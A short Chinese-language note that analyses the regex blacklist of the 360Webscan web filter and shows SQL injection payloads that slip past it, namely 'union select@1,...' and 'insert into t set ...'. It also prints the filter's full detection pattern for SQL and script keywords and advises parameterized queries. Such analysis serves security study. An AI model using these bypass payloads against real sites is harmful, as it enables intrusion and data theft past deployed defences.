360Webscan Bypass
先看 select 相关的正则。关键在 `UNION.+?SELECT@{0,2}(\(.+\)|\s+?.+?|(`|'|" ).*?(`| '|"))` 这一段：`SELECT` 后面只允许出现 0～2 个 `@`，之后必须紧跟 `(`、空白或引号/反引号之一，否则整条 `UNION ... SELECT` 分支不会命中：
\<.+javascript:window\[.{1}\\x|<.*=(&#\d+?;?)+?>|<.*(data|src)=data:text\/html.*>|\b(alert\(|confirm\(|expression\(|prompt\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|load_file\s*?\()|<[a-z]+?\b[^>]*?\bon([a-z]{4,})\s*?=|^\+\/v(8|9)|\b( and | or )\b\s*?([\(\) '"\d]+?=[\(\)' "\d]+?|[\(\) '"a-zA-Z]+?=[\(\)' "a-zA-Z]+?|>|<|\s+?[\w]+?\s+?\bin\b\s*?\(|\blike\b\s+?[ "'])|\/\*.*\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT@{0,2}(\(.+\)|\s+?.+?|(`|'|" ).*?(`| '|"))|UPDATE@{0,2}(\(.+\)|\s+?.+?|(`|' |").*?(`| '|"))SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE)@{0,2}(\(.+\)|\s+?.+?\s+?|(`|' |").*?(`| '|"))FROM(\(.+\)|\s+?.+?|(`|' |").*?(`| '|"))|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)|\/\*.*?\*\/|' |
Bypass（`select@1` 里的 `@` 被 `@{0,2}` 消耗后，紧接的 `1` 既不是 `(`、空白，也不是引号/反引号，`UNION.+?SELECT` 分支匹配失败；在 MySQL 中 `@1` 是一个未赋值的用户变量，求值为 NULL，因此第一列仍能正常占位，`@1=@1` 同理）：
union select@1,2,3,4,5,6,7
union select@1=@1,2,3,4,5,6,7
再看 insert 相关的正则。注意上面 select 正则里对应的分支只有 `INSERT\s+INTO.+?VALUES`，即仅在语句中出现 `VALUES` 时才命中；下面这条则把 `SET` 也纳入了：
INSERT\s+INTO.+?(VALUES|SET) |
Bypass（利用 MySQL 的 `INSERT ... SET col=val` 语法，整条语句中不出现 `VALUES`，所以只含 `INSERT\s+INTO.+?VALUES` 的规则不会命中。需要注意：若规则已经是 `INSERT\s+INTO.+?(VALUES|SET)` 且以不区分大小写方式编译，`insert into t set cmd=123` 中的 `insert into` + ` t ` + `set` 会被匹配到，这个 payload 就不再有效；这类基于正则黑名单的拦截本身很脆弱，应用侧仍应以参数化查询作为根本防线）：
insert into t set cmd=123